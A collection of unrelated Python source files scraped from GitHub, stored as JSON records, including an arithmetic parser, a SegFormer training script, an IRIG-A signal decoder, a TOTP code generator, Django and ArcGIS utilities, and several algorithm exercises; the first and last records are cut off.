pace.\n\t\t\"\"\"\n print (self.getName() + \" starts...\")\n for i in range(self.begin, self.end+1):\n rnd = randint(1, self.pace)\n print (self.getName() + \\\n\t\t\t\t\"sleeps %d seconds\" % rnd)\n sleep(rnd)\n print (\"appending %d to queue\" % i)\n self.queue.append(i)\n print (\"Productor terminado\")\n\t\t\ndef main():\n\t\"\"\"\n\tcreates a producer object.\n\t\"\"\"\n\tque = []\n\tprd = Producer('producer', que, 3, 9, 10)\n\tprd.start()\n\tprd.join()\nif __name__==\"__main__\":\n\tmain()\n\n\n#Añadir un hola mundo\nprint(\"Hola Mundo\");\n\t\n\t\n\t\n\t\t\t\n","repo_name":"chrisb1397/Software_Productor_Consumidor","sub_path":"consumidor.py","file_name":"consumidor.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25878233767","text":"from functools import reduce\r\nfrom typing import Callable, Literal, TypeAlias\r\nfrom decimal import Decimal\r\n\r\nfrom types_ import AstElement\r\nfrom parser_combinator import (\r\n Parser,\r\n Reserved,\r\n Number,\r\n Lazy,\r\n Phrase,\r\n)\r\nfrom nodes import BinOperationNode\r\n\r\n\r\nPLUS, MINUS = Reserved(\"+\"), Reserved(\"-\")\r\nTIMES, DIVIDE = Reserved(\"*\"), Reserved(\"/\")\r\nLPAREN, RPAREN = Reserved(\"(\"), Reserved(\")\")\r\n\r\n\r\nParenthisExpression: TypeAlias = (\r\n tuple[tuple[Literal[\"(\"], AstElement], Literal[\")\"]]\r\n)\r\n\r\n\r\ndef parenthis_parse(\r\n expr: ParenthisExpression) -> AstElement:\r\n ((_, response), _) = expr\r\n return response\r\n\r\n\r\ndef factor() -> Parser:\r\n return (\r\n Number() |\r\n (LPAREN + Lazy(expression) + RPAREN) ^ parenthis_parse\r\n )\r\n\r\n\r\nBinNumbers: TypeAlias = float | int | Decimal\r\n\r\n\r\ndef bin_operation(\r\n operator: str) -> Callable[[BinNumbers, BinNumbers], BinOperationNode]:\r\n return (lambda left, right: BinOperationNode(operator, left, right))\r\n\r\n\r\ndef any_operator_in_list(operators: list[str]) -> Parser:\r\n operators_parsers: list[Parser] = (\r\n [Reserved(operator) for operator in operators]\r\n )\r\n parser = reduce(\r\n (lambda left, right: left | right),\r\n operators_parsers\r\n )\r\n return parser\r\n\r\n\r\ndef get_precedence() -> list[list[str]]:\r\n return [\r\n [\"^\", ],\r\n [\"*\", \"/\"],\r\n [\"+\", \"-\"],\r\n ]\r\n\r\n\r\nCombine: TypeAlias = (\r\n Callable[[str], Callable[[BinNumbers, BinNumbers], BinOperationNode]]\r\n)\r\n\r\n\r\ndef operator_parser(precedence_level: list[str], combine: Combine) -> Parser:\r\n return any_operator_in_list(precedence_level) ^ combine\r\n\r\n\r\ndef precedence(\r\n value_parser: Parser,\r\n precedence_levels: list[list[str]],\r\n combine: Combine) -> Parser:\r\n parser = value_parser * operator_parser(precedence_levels[0], combine)\r\n\r\n for precedence_level in precedence_levels[1:]:\r\n parser = parser * operator_parser(precedence_level, combine)\r\n\r\n return parser\r\n\r\n\r\ndef expression() -> Parser:\r\n return precedence(\r\n factor(),\r\n get_precedence(),\r\n bin_operation\r\n )\r\n\r\n\r\ndef parser() -> Phrase:\r\n return Phrase(expression())\r\n","repo_name":"OlejaPythonist/calculator","sub_path":"calculator/arithmetic_parser.py","file_name":"arithmetic_parser.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"62669615","text":"import random\n\nfrom transformers import SegformerImageProcessor\nfrom SegformerFinetuner import SegformerFinetuner\nfrom carla import CarlaImagesDataset\nfrom torch.utils.data import Dataset, DataLoader\nimport torch\n\nfrom pytorch_lightning.callbacks.early_stopping import EarlyStopping\nfrom pytorch_lightning.callbacks.model_checkpoint import ModelCheckpoint\nimport pytorch_lightning as pl\nfrom multiprocessing import freeze_support\n\ndef main():\n seed = torch.Generator().manual_seed(42)\n data_root = \"D:/WorkSpace/Carla1/carla_images_ft\"\n\n feature_extractor = SegformerImageProcessor.from_pretrained(\"nvidia/segformer-b5-finetuned-cityscapes-1024-1024\")\n feature_extractor.do_reduce_labels = False\n\n dataset = CarlaImagesDataset(data_root, feature_extractor)\n train_dataset, val_dataset = torch.utils.data.random_split(dataset,\n [int(len(dataset) * 0.8), int(len(dataset) * 0.2)],\n generator=seed)\n\n batch_size = 2\n train_dataloader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True, num_workers=1, prefetch_factor=8)\n val_dataloader = DataLoader(val_dataset, batch_size=batch_size, num_workers=1, prefetch_factor=8)\n id2label = dataset.id2label\n num_classes = len(id2label)\n label2id = {v: k for k, v in id2label.items()}\n torch.set_float32_matmul_precision('high')\n\n # jitter = ColorJitter(brightness=0.25, contrast=0.25, saturation=0.25, hue=0.1)\n\n segformer_finetuner = SegformerFinetuner(\n dataset.id2label,\n train_dataloader=train_dataloader,\n val_dataloader=val_dataloader,\n # test_dataloader=test_dataloader,\n metrics_interval=10,\n )\n\n early_stop_callback = EarlyStopping(\n monitor=\"val_loss\",\n min_delta=0.00,\n patience=3,\n verbose=False,\n mode=\"min\",\n )\n\n checkpoint_callback = ModelCheckpoint(save_top_k=1, monitor=\"val_loss\")\n trainer = pl.Trainer(\n num_nodes=1,\n callbacks=[early_stop_callback, checkpoint_callback],\n max_epochs=50,\n val_check_interval=len(train_dataloader),\n )\n\n trainer.fit(segformer_finetuner)\n\nif __name__ == '__main__':\n # freeze_support()\n main()\n\n","repo_name":"zhanghang211202/segformer_ft","sub_path":"train_carla.py","file_name":"train_carla.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"31136400982","text":"import pyotp\nimport sys\n\n#########\nclass cloudflare:\n codename = None\n def __init__(self):\n self.authySecret = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\" # change your authysecret key\n def getAuthy(self):\n totp = pyotp.TOTP(self.authySecret)\n totp.digits = 7\n totp.interval = 10\n totp.issuer = \"Cloudflare\"\n return(totp.now())\n\nc1 = cloudflare()\nprint(\"Authy token code : \",c1.getAuthy())\n","repo_name":"sailay1996/pyauthy","sub_path":"authy.py","file_name":"authy.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"43004990331","text":"from __future__ import (absolute_import, division, print_function,\n unicode_literals)\nimport os\nimport xml.etree.ElementTree as ET\nimport logging\n\nlog = logging.getLogger(__name__)\n\n\nclass TestData(object):\n def __init__(self, data_folder):\n self.data_folder = data_folder\n\n def get_test_data(self, test_number):\n # Create the test file name\n filename = os.path.join(self.data_folder,\n \"test{0}\".format(test_number))\n\n # The user should handle the exception from failing to find the file.\n tree = ET.parse(filename)\n\n # We need the text.\n reply = tree.find(\"reply\")\n data = reply.find(\"data\")\n\n # Return the text contents of the data\n return data.text\n\n\nif __name__ == '__main__':\n td = TestData(\"./data\")\n data = td.get_test_data(1)\n print(data)\n","repo_name":"huokedu/Open-Source-Cryptocurrency-Exchange","sub_path":"M/build-x86_64-linux-gnu/curl-7.55.1/tests/curl_test_data.py","file_name":"curl_test_data.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"35"} +{"seq_id":"42770694142","text":"from django.core.management.base import BaseCommand\nfrom django.db import transaction\n\n\nfrom device.models.device import (\n Device,\n Data,\n)\nimport csv\nimport sys\nfrom datetime import datetime\n\n\nclass Command(BaseCommand):\n\n \"\"\"\n Command to load initial data into database.\n \"\"\"\n\n help = 'Loads initial data set into database.'\n\n def add_arguments(self, parser):\n # Positional arguments\n parser.add_argument('device_ip', nargs='+', type=str)\n\n # Named (optional) arguments\n parser.add_argument(\n '--datafile',\n default='',\n help='Use the data file as source.',\n )\n\n @transaction.atomic\n def handle(self, *args, **options):\n\n data_file = options.get('datafile', None)\n\n device_ip = options.get('device_ip')\n\n if not device_ip:\n sys.exit(\"Device ip not provided.\")\n\n # Find the deivce\n device, created = Device.objects.get_or_create(ip_address=device_ip[0])\n if created:\n device.save()\n\n data = []\n if data_file:\n data, data_type = self.read_data_file(data_file)\n\n if len(data) > 1:\n header = data[0]\n header_dict = {}\n for idx, title in enumerate(header):\n header_dict.update({\n title: idx\n })\n data = data[1:]\n\n for data_line in data:\n print(data_line)\n data_obj = Data(\n device=device,\n data_arrival_time=datetime.strptime(data_line[header_dict['time']], \"%d-%b-%Y %H:%M\"),\n voltage=data_line[header_dict['voltage']].replace('.', ''),\n current=data_line[header_dict['current']].replace('.', ''),\n power=data_line[header_dict['power']].replace('.', ''),\n energy=data_line[header_dict['energy']].replace('.', ''),\n runtime=data_line[header_dict['runtime']].replace('.', ''),\n state=0\n )\n data_obj.save()\n\n def read_data_file(self, datafile):\n data = []\n file_type = datafile.split('.')[-1]\n if 'json' in file_type:\n json_file = open(datafile, encoding='utf-8')\n data = json.load(json_file)\n json_file.close()\n elif 'csv' in file_type:\n with open(datafile) as csvfile:\n spamreader = csv.reader(csvfile, delimiter=',')\n for row in spamreader:\n data.append(row)\n return data, file_type\n","repo_name":"vkylamba/IoT-Management","sub_path":"src/device/management/commands/load_csv.py","file_name":"load_csv.py","file_ext":"py","file_size_in_byte":2572,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"42218558067","text":"import numpy as np\r\nfrom datetime import timedelta,datetime\r\nimport matplotlib.pyplot as plt\r\n#### for sample code, see read_DAQ.DAQ_time\r\n##def to_seconds(time_delta):\r\n## ## this is o that we can convert arrays of timedelta objects to arrays of seconds\r\n## return time_delta.total_seconds()\r\n##to_seconds=np.vectorize(to_seconds) ## so that we can apply this function to arrays\r\n\r\ndef BCD(data):\r\n \"\"\" given a list of o's and 1's, convert to a binary coded decimal, where the Least significant digit is FIRST. length of data must be divisiable by 4 \"\"\"\r\n if len(data)%4 !=0:\r\n print(\"ERROR!, length of data must be divisible by 4 in BCD\")\r\n exit()\r\n\r\n N_digits=len(data)/4\r\n num=0*data[0] ## data may be a list of floats, or list of arrays of floats\r\n for i in range(int(N_digits)):\r\n num+=sum( [ (10**i)*(2**ind)*b for ind,b in enumerate(data[4*i:4*(i+1)])] )\r\n return num\r\n\r\nIRIGA_rate=1000\r\ntime_frame=0.1\r\n\r\nsampling_rate=10e6\r\ndef IRIGA_signal(signal, sampling_rate, year=2000):\r\n \"\"\"for a IRIG_A signal that is sampled for sampling_rate (sampling rate is assumed to be perfect)\r\n this function returns a datetime object and an array of floats that is time in seconds relative to the datetime object\r\n sampling_rate should be a number, and signal should be a numpy array \"\"\"\r\n \r\n sampling_rate=float(sampling_rate)\r\n\r\n signal=signal>(np.max(signal) + np.min(signal))*0.5 ## seperate signal into \"high\" and \"low\"\r\n ## this signal is a stream of bits. Each bit is when the signal is high. The kind of bit is detemined by the width.\r\n ## there are exactly 1000 bits per second\r\n\r\n bit_pos=np.where( signal[1:]>signal[:-1] )[0] ## positions of the begining of each bit\r\n bit_end_pos=np.where( signal[1:]=0.0002*sampling_rate-1, bit_width<=0.0002*sampling_rate+1) ] = 0 ## 0 will mean a low bit ## sometimes there is a sampling error, and the width is one point too short or too long\r\n bit_type[ np.logical_and(bit_width>=0.0005*sampling_rate-1, bit_width<=0.0005*sampling_rate+1) ] = 1 ## 1 will mean a high bit\r\n\r\n ## now all the bit_types that are position bits have the value -1\r\n ## there are two kinds of position bits: the first kind occurs 10 times in a 0.1 second, this kind counts from 0 to 9. The second kind of position bit is a position referance bit. It happens once in a 0.1 second, and allways happens after a 0 position bit.\r\n ## thus, if there are two bits in a rwo, the first is a 0 position bit, the second is a position referance bit\r\n ## we will identify the position referance bit with a 2, and a normal position bit will be identified with a -1\r\n bit_type[1:][ np.logical_and( bit_type[:-1]==-1, bit_type[1:]==-1) ]=2\r\n\r\n referance_bit_indeces=np.where(bit_type==2)[0] ## the position referance bit (a bit type of 2), always happens at exactly the tenth of a second time\r\n last_referance_bit=referance_bit_indeces[-1]\r\n referance_bit_indeces=referance_bit_indeces[:-1] ## the last timeframe will not be complete. So we will ignore it.\r\n N_time_frames=len(referance_bit_indeces)\r\n time_frame_signal_pos=bit_pos[referance_bit_indeces]\r\n ZEROS=np.zeros(N_time_frames)\r\n \r\n \r\n \r\n \r\n# BAD= np.where(referance_bit_indeces[:-1]-referance_bit_indeces[1:] + 100 !=0)[0]\r\n# \r\n# print referance_bit_indeces[BAD], referance_bit_indeces[BAD+1], referance_bit_indeces[BAD+2]\r\n# B=0\r\n#\r\n# print bit_type[referance_bit_indeces[BAD[B]]:referance_bit_indeces[BAD[B]+2]]\r\n# \r\n# for RB in xrange(referance_bit_indeces[BAD[B]]-1, referance_bit_indeces[BAD[B]+2]+1):\r\n# if bit_type[RB]==-1:\r\n# t='g'\r\n# elif bit_type[RB]==2:\r\n# t='b'\r\n# else:\r\n# t='r'\r\n# \r\n# plt.plot( np.arange(bit_pos[RB],bit_pos[RB+1]), signal[bit_pos[RB]:bit_pos[RB+1]],t)\r\n# plt.show()\r\n \r\n\r\n ## now we use the information encoded after each referance bit to find the time information\r\n ## I don't even know how to document this next bit so that it makes sence. Just trust me.\r\n seconds=BCD([bit_type[referance_bit_indeces+1],bit_type[referance_bit_indeces+2],bit_type[referance_bit_indeces+3],bit_type[referance_bit_indeces+4], bit_type[referance_bit_indeces+6],bit_type[referance_bit_indeces+7],bit_type[referance_bit_indeces+8], ZEROS])\r\n\r\n minutes=BCD([bit_type[referance_bit_indeces+10],bit_type[referance_bit_indeces+11],bit_type[referance_bit_indeces+12],bit_type[referance_bit_indeces+13], bit_type[referance_bit_indeces+15],bit_type[referance_bit_indeces+16],bit_type[referance_bit_indeces+17],ZEROS])\r\n\r\n hours=BCD([bit_type[referance_bit_indeces+20],bit_type[referance_bit_indeces+21],bit_type[referance_bit_indeces+22],bit_type[referance_bit_indeces+23], bit_type[referance_bit_indeces+25],bit_type[referance_bit_indeces+26],ZEROS,ZEROS])\r\n\r\n days=BCD([bit_type[referance_bit_indeces+30],bit_type[referance_bit_indeces+31],bit_type[referance_bit_indeces+32],bit_type[referance_bit_indeces+33], bit_type[referance_bit_indeces+35],bit_type[referance_bit_indeces+36],bit_type[referance_bit_indeces+37],bit_type[referance_bit_indeces+38], bit_type[referance_bit_indeces+40],bit_type[referance_bit_indeces+41],ZEROS,ZEROS ])\r\n\r\n tenths_seconds=BCD([bit_type[referance_bit_indeces+45],bit_type[referance_bit_indeces+46],bit_type[referance_bit_indeces+47],bit_type[referance_bit_indeces+48]])\r\n\r\n ## now we can generate the time objects based on the info in the next frame\r\n ##time_info=np.empty(N_time_frames, dtype=timedelta)\r\n initial_timedelta=timedelta(days=days[0], hours=hours[0], minutes=minutes[0], seconds=seconds[0]+tenths_seconds[0]/10.0) - timedelta(seconds=time_frame_signal_pos[0]/float(sampling_rate))\r\n initial_timestamp=datetime(year=year, month=1, day=1)+initial_timedelta\r\n\r\n time=np.empty(len(signal), dtype=np.double)\r\n time_indeces=np.arange(len(signal))\r\n \r\n start_signal_index=0\r\n for i in range(N_time_frames):\r\n \r\n signal_i=time_frame_signal_pos[i] \r\n \r\n ##check that the frame is good\r\n if (i!=N_time_frames-1 and referance_bit_indeces[i+1]-referance_bit_indeces[i]!=100) or (i==N_time_frames-1 and last_referance_bit-referance_bit_indeces[i]!=100): \r\n ##the frame is bad if there is not exactly 100 bits to the next frame\r\n seconds_from_timestamp=time[start_signal_index-1]+1.0/sampling_rate ## this may not work. Assumes that seconds from timestamp is at begenning of frame. Is this true?\r\n print(\"This IRIG has T1 issues, sugest 'retiming'\")\r\n \r\n else:\r\n seconds_from_timestamp=(timedelta(days=days[i], hours=hours[i], minutes=minutes[i], seconds=seconds[i]+tenths_seconds[i]/10.0)-initial_timedelta).total_seconds()\r\n \r\n if seconds_from_timestamp<0: ## some other issue I haven't tracked down\r\n seconds_from_timestamp=time[start_signal_index-1]+1.0/sampling_rate\r\n print(\"This IRIG has T2 issues, sugest 'retiming'\")\r\n \r\n ## there are still more issues I have yet to track down.\r\n \r\n time[start_signal_index:signal_i]=seconds_from_timestamp+(time_indeces[start_signal_index:signal_i]-signal_i)/sampling_rate\r\n \r\n start_signal_index=signal_i\r\n\r\n ## get the last bit\r\n time[start_signal_index:]=seconds_from_timestamp+(time_indeces[start_signal_index:]-time_frame_signal_pos[i])/sampling_rate\r\n\r\n\r\n ## and I processed a IRIG-A signal in python with only one explit loop. WOOT!\r\n return initial_timestamp, time\r\n","repo_name":"felipelenz/Skywaves","sub_path":"IRIGA.py","file_name":"IRIGA.py","file_ext":"py","file_size_in_byte":8290,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"37595201359","text":"import sys\n\nfrom builtin_types import BUILTIN_TYPES\nfrom mako.template import Template\n\ntemplate = \"\"\"\\\n/*\n * Copyright 2023 Intel Corporation\n * SPDX-License-Identifier: MIT\n */\n\n/* This is an automatically generated file. */\n\n#include \"glsl_types.h\"\n#include \"util/glheader.h\"\n\nconst char glsl_type_builtin_names[] =\n%for n in NAME_ARRAY:\n \"${n}\"\n%endfor\n;\n\n%for t in BUILTIN_TYPES:\nconst struct glsl_type glsl_type_builtin_${t[\"name\"]} = {\n %for k, v in t.items():\n %if v is None or k == \"name\":\n <% continue %>\n %elif k == \"name_id\":\n .name_id = ${v},\n .has_builtin_name = 1,\n %else:\n .${k} = ${v},\n %endif\n %endfor\n};\n\n%endfor\"\"\"\n\nif len(sys.argv) < 2:\n print('Missing output argument', file=sys.stderr)\n sys.exit(1)\n\noutput = sys.argv[1]\n\n# Add padding to make sure zero is an invalid name.\ninvalid = \"INVALID\"\nNAME_ARRAY = [invalid + \"\\\\0\"]\nid = len(invalid) + 1\n\nfor t in BUILTIN_TYPES:\n name = t[\"name\"]\n NAME_ARRAY.append(name + \"\\\\0\")\n t[\"name_id\"] = id\n id += len(name) + 1\n\nwith open(output, 'w') as f:\n f.write(Template(template).render(BUILTIN_TYPES=BUILTIN_TYPES, NAME_ARRAY=NAME_ARRAY))\n","repo_name":"google/dive","sub_path":"third_party/mesa/src/compiler/builtin_types_c.py","file_name":"builtin_types_c.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"35"} +{"seq_id":"72696255462","text":"#!/usr/bin/env python3\nimport sys\nimport itertools\nfrom collections import namedtuple, defaultdict\n\nState=namedtuple('State', ['positions', 'cost', 'code'])\n\nroom = [l.strip() for l in sys.stdin.readlines()]\n\nH = len(room)\nW = len(room[0])\n\nkeys = ''.join([chr(x) for x in range(ord('a'), ord('z') + 1)])\nrealKeys = []\ndoors = keys.upper()\nrealDoors = []\n\nfor y in range(H):\n for x in range(W):\n ch = room[y][x]\n if ch == '@':\n start = (y,x)\n elif ch in keys:\n realKeys.append(ch)\n elif ch in doors:\n realDoors.append(ch)\n\nroom = [ list(x) for x in room ]\n\nroom[start[0]][start[1]] = '#'\nroom[start[0]-1][start[1]] = '#'\nroom[start[0]+1][start[1]] = '#'\nroom[start[0]][start[1]-1] = '#'\nroom[start[0]][start[1]+1] = '#'\n\ns1 = (start[0]-1, start[1]-1)\nroom[start[0]-1][start[1]-1] = '@'\n\ns2 = (start[0]+1, start[1]-1)\nroom[start[0]+1][start[1]-1] = '@'\n\ns3 = (start[0]-1, start[1]+1)\nroom[start[0]-1][start[1]+1] = '@'\n\ns4 = (start[0]+1, start[1]+1)\nroom[start[0]+1][start[1]+1] = '@'\n\nroom = [ ''.join(x) for x in room ]\n\n\ninitial = State((s1, s2, s3, s4), 0, '@')\nprint(initial)\n\nfor l in room:\n print(l)\n\ndef allKeysGathered(code):\n return all([ch in code for ch in realKeys])\n\ndef neigbors(pos):\n if len(pos) == 2:\n y,x = pos\n elif len(pos) == 3:\n y,x,_ = pos\n return [(y-1,x), (y+1,x),(y,x-1), (y,x+1)]\n \ndef neigborsForSet(pos):\n n = []\n for p in pos:\n nn = neigbors(p)\n nn.append(p)\n n.append(nn)\n \n return itertools.product(*n)\n\ndef getNextStates(state):\n visited = set()\n nextStates = []\n \n iteration = 1\n q = []\n q.extend(neigborsForSet(state.positions))\n visited.add(state.positions)\n\n while len(q) > 0:\n ql = len(q)\n for i in range(ql):\n positions = q[i]\n\n if positions in visited:\n continue\n\n visited.add(positions)\n\n badPosition = False\n for pos in positions:\n y, x = pos\n if x < 0 or x >= W or y < 0 or y >= H or room[y][x] == '#':\n badPosition = True\n break\n \n if badPosition:\n continue\n\n cannotMove = False\n addCode = ''\n for pos in positions:\n y, x = pos \n ch = room[y][x]\n\n if ch in keys and not ch in state.code:\n # aquired key\n addCode += ch\n createsState = True\n elif ch in doors and not ch in state.code:\n if ch.lower() in state.code:\n # opened door first time\n addCode += ch\n createsState = True\n else:\n # cutoff BFS (closed door)\n cannotMove = True\n \n if cannotMove:\n continue\n\n if addCode:\n nextStates.append(State(positions, state.cost + iteration, state.code + addCode))\n else:\n q.extend(neigborsForSet(positions))\n \n q = q[ql:]\n #print(iteration, 'done', ql, 'elements')\n sys.stdout.flush()\n iteration += 1\n\n return nextStates\n\n\nprevStateCount = 0\nstates = [initial]\nfinalStates = []\n\nbestAllKeys = 1000000000\nbestAllKeysState = None\n\n# while prevStateCount != len(states):\nwhile len(states) > 0:\n print('States count', len(states))\n groups = defaultdict(lambda:[])\n for s in states:\n # same point, with same state so far\n \n l = list(s.code[:-1])\n l.sort()\n same = ''.join(l) + s.code[-1]\n groups[same].append(s)\n\n if allKeysGathered(s.code):\n if s.cost < bestAllKeys:\n bestAllKeys = s.cost\n bestAllKeysState = s\n\n states = []\n for k,v in groups.items():\n bestCost = 1000000000000\n for s in v:\n if s.cost < bestCost:\n bestCost = s.cost\n for s in v:\n if s.cost == bestCost:\n states.append(s)\n\n print('Filtered count', len(states))\n sys.stdout.flush()\n\n prevStateCount = len(states)\n nextStates = []\n for s in states:\n n = getNextStates(s)\n if n:\n nextStates.extend(n)\n else:\n finalStates.append(s)\n states = nextStates\n\n if len(states) < 50:\n print(states)\n \n\n# not 6039\n\nlowestCost = 1000000000000\nbestState = None\nfor s in finalStates:\n if s.cost < lowestCost:\n lowestCost = s.cost\n bestState = s\n\nprint(bestState)\nprint(bestState.code)\n\nprint(bestAllKeys)\nprint(bestAllKeysState)","repo_name":"Bajron/aoc2019","sub_path":"day18b.py","file_name":"day18b.py","file_ext":"py","file_size_in_byte":4755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"16344634445","text":"__version__ = \"1.4\"\n'''\n__author__ = \"Simon Geigenberger, Lukas Bug\"\n__copyright__ = \"Copyright 2018, Esri Deutschland GmbH\"\n__license__ = \"Apache-2.0\"\n__version__ = \"1.4\"\n__email__ = \"simon@geigenberger.info, lukas.bug@aol.de\"\n'''\n\nimport json\nimport sys\n\ndef readConfig():\n dictAGOLConfig = {}\n \n #Try to import the ArcGIS API for Python\n try:\n from arcgis.gis import GIS\n except:\n print(\"ArcGIS API for Python cannot be imported\")\n sys.exit()\n \n #Check version of ArcGIS API for Python <= 1.5.0\n import arcgis\n v = int(arcgis.__version__.replace(\".\", \"\"))\n if v > 150:\n print(\"ArcGIS API for Python is newer than the version required by this module, please install ArcGIS API for Python 1.5.0 or a previous version.\")\n sys.exit()\n \n #Try to open the config file.\n try:\n json_data = open(\"agolconfig.json\").read()\n except:\n print(\"JSON file does not exist.\")\n sys.exit()\n \n #Try to load the config file as JSON.\n try:\n data = json.loads(json_data)\n except:\n print(\"JSON file cannot be read.\")\n sys.exit()\n \n #Check if a portal is selected\n try:\n portalInit = data[\"portalInit\"]\n dictAGOLConfig[\"portal\"] = portalInit\n except:\n print(\"No Portal chosen.\")\n sys.exit()\n \n #Check if a user is selected\n try:\n userInit = data[\"userInit\"]\n dictAGOLConfig[\"user\"] = userInit\n except:\n print(\"No user chosen.\") \n sys.exit()\n \n #check if a password is selected\n try:\n passwordInit = data[\"passwordInit\"]\n dictAGOLConfig[\"password\"] = passwordInit\n except:\n print(\"No passord box chosen.\")\n sys.exit()\n \n #Try to connect to the selected portal with the login information.\n try:\n GIS(portalInit, userInit, passwordInit)\n except:\n print(\"Cannot connect to the portal.\")\n sys.exit()\n \n #Checks if a titel is selected\n try:\n title = data[\"title\"]\n dictAGOLConfig[\"title\"] = title\n except:\n print(\"No title chosen.\")\n sys.exit()\n \n #Check if tags are selected. Remove tags if the string contains only spaces.\n try:\n tags = data[\"tags\"]\n if len(tags) == 0:\n print(\"No tags chosen - 1.\")\n sys.exit()\n should_restart = True\n while should_restart:\n should_restart = False\n for tag in tags:\n tagTest = tag.lstrip()\n if len(tagTest) == 0:\n tags.remove(tag)\n should_restart = True\n if len(tags) == 0:\n print(\"No tags chosen - 2.\")\n sys.exit()\n else:\n dictAGOLConfig[\"tags\"] = tags\n except:\n print(\"No tags chosen - 3.\")\n sys.exit()\n \n #Check if a description is selected.\n try:\n description = data[\"description\"]\n dictAGOLConfig[\"description\"] = description\n except:\n print(\"No description chosen.\")\n sys.exit()\n \n #Checks if a copyrightText is selected\n try:\n copyrightText = data[\"copyrightText\"]\n dictAGOLConfig[\"copyrightText\"] = copyrightText\n except:\n print(\"No copyrightText chosen.\")\n sys.exit()\n \n #Checks if a maxRecordCount is selected\n try:\n maxRecordCount = data[\"maxRecordCount\"]\n dictAGOLConfig[\"maxRecordCount\"] = maxRecordCount\n except:\n print(\"No maxRecordCount chosen.\")\n sys.exit()\n \n dictAGOLConfig[\"overwriteService\"] = 0\n return dictAGOLConfig\n","repo_name":"EsriDE/EsriDE-python-osm2arcgis","sub_path":"AGOLConfigHelper.py","file_name":"AGOLConfigHelper.py","file_ext":"py","file_size_in_byte":3628,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"35"} +{"seq_id":"25608502179","text":"# coding=utf-8\n\n'''\nGiven a root node reference of a BST and a key,\ndelete the node with the given key in the BST.\nReturn the root node reference (possibly updated) of the BST.\n\nBasically, the deletion can be divided into two stages:\n\nSearch for a node to remove.\nIf the node is found, delete the node.\nNote: Time complexity should be O(height of tree).\n\nExample:\n\nroot = [5,3,6,2,4,null,7]\nkey = 3\n\n 5\n / \\\n 3 6\n / \\ \\\n2 4 7\n\nGiven key to delete is 3. So we find the node with value 3 and delete it.\n\nOne valid answer is [5,4,6,2,null,null,7], shown in the following BST.\n\n 5\n / \\\n 4 6\n / \\\n2 7\n\nAnother valid answer is [5,2,6,null,4,null,7].\n\n 5\n / \\\n 2 6\n \\ \\\n 4 7\n'''\n\n'''\n算法教材里二叉树最重要的操作之一,这道题实现难点在于没有父节点信息\n唯一的办法只能通过runner technique保存之前遍历的结点,因此带来\n很多boundary case的问题,另外找寻后继结点并解链返回的函数也很复杂\nBeat 67.87%\n公司:Uber\n'''\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def FM(self, base, root):\n \"\"\"\n :type base: 起始结点root的父节点,保证root就是后继结点时可以解链\n :type root: 是base结点的右孩子\n \"\"\"\n pre, cur = None, root\n while cur.left:\n pre = cur\n cur = cur.left\n if cur == root: # 如果root就是后继结点\n pre = base\n pre.right = cur.right\n return cur\n if not cur.right: # 如果后继结点没有右孩子\n pre.left = None\n return cur\n else: # 如果后继结点没有左孩子\n pre.left = cur.right\n return cur\n\n def deleteNode(self, root, key):\n \"\"\"\n :type root: TreeNode\n :type key: int\n :rtype: TreeNode\n \"\"\"\n head, cur = TreeNode('dummy'), root # dummy node保证单节点也可以正确删除\n pre = head\n pre.right = cur\n while cur: # 找寻过程\n if cur.val < key:\n pre = cur\n cur = cur.right\n elif cur.val > key:\n pre = cur\n cur = cur.left\n else:\n break\n\n if not cur: return root # 没有key的情况\n\n if not cur.left and not cur.right: # 删除点是叶节点\n if pre.left == cur:\n pre.left = None\n else:\n pre.right = None\n elif not cur.left:\n if pre.left == cur:\n pre.left = cur.right\n else:\n pre.right = cur.right\n elif not cur.right:\n if pre.left == cur:\n pre.left = cur.left\n else:\n pre.right = cur.left\n else: # 删除点左右孩子都存在\n node = self.FM(cur, cur.right)\n if pre.left == cur:\n pre.left = node\n else:\n pre.right = node\n node.left = cur.left\n node.right = cur.right\n return head.right\n","repo_name":"sindwerra/Algorithms","sub_path":"Leetcode/Tree/#450-Delete Node in a BST/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3369,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"35"} +{"seq_id":"23402018832","text":"# coding=utf-8\n\n\"\"\"\n题目:给你单链表的头节点 head ,请你反转链表,并返回反转后的链表。\n解法1:列表状态变化展示\nS0: None; 1 - 2 - 3 - 4 - 5\nS1: 1; 2 - 3 - 4 - 5\nS2: 2 - 1; 3 - 4 - 5\nS3: 3 - 2 - 1; 4 - 5\nS4: 4 - 3 - 2 - 1; 5\nS5: 5 - 4 - 3 - 2 - 1; None\n右侧链表状态实际上与head = head.next的循环状态一致\n左侧起始为None,后逐渐变成倒序head,作为返回结果\n这样需要一个变量res存储左侧链表状态\n需要tmp作为临时头插到左侧head之前\n\"\"\"\n\n\ndef reverseList(head):\n res = None\n while head:\n tmp = head\n head = head.next\n tmp.next = res\n res = tmp\n return res\n\n\nif __name__ == \"__main__\":\n from Algorithm.AlgorithmPython.CodeTop.ListNodeQuestion.tools.define import list_to_listnode, listnode_to_list\n test_head = list_to_listnode([1, 2, 3, 4, 5])\n\n # test 